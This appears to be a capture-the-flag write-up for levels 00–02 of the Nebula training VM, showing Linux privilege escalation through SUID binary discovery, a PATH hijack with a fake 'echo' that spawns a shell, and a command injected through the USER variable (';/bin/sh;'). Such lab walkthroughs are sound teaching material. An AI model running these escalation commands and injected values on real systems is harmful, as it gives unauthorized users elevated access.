Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.

To follow along, get the Nebula VM from Exploit Education…Exploit Education :: Andrew Griffiths’ Exploit Education
exploit.education provides a variety of resources that can be used to learn about vulnerability analysis, exploit…exploit.education

Level 00 (Set User ID)

Finding the files and ignoring errors…

find / -perm /4000 2>/dev/null

A lot of these are common linux files that are Set User ID so over time you get to know them and ignore them, unless your in a CTF that is trolling you and the issue is in a common bin, so always check anyway if it’s at a dead end or an old version that has known vulnerabilities.

Of course “/bin/…/flag00” is seriously suspect, so we try this…

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

It really was that easy but do not underestimate the power of Set User ID, it has allowed me to priv. esc. more times than I can recall, it’s powerfull, it’s common, use it! Always check permissions!

Search for SUID/GUID binaries

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Nebula Level00
Recorded by int0x33asciinema.org

Level 01 (Environment Variable Injection — PATH)

Challenge source is provided, can we spot the vulnerability?

We know we can alter environment variables and that the program will do the following:

setresuid() which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process and setresgid() which sets the real GID, effective GID, and saved set-group-ID of the calling process.

With the source code, and access to the server, it’s easy to spot the issue:

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

If we can change our executable $PATH to first check /tmp a place we know we can write to, then we can put our own ‘echo’ binary there which will allow us to call a system process as flag01. Out echo program will simply spawn a new shell.

nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag

Nebula – Level01
Recorded by int0x33asciinema.org

Level 02 (Environment Variable Injection — USER)

We get the source again for this..

This one is easy, we can just inject a command into the USER environment variable.

cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag

The 2x semi-colons in the “/bin/sh” command injection are important as bash needs that to separate the commands otherwise it will look for “echo /bin/sh is cool” which of course is junk for us.Nebula – level 02
Recorded by int0x33asciinema.org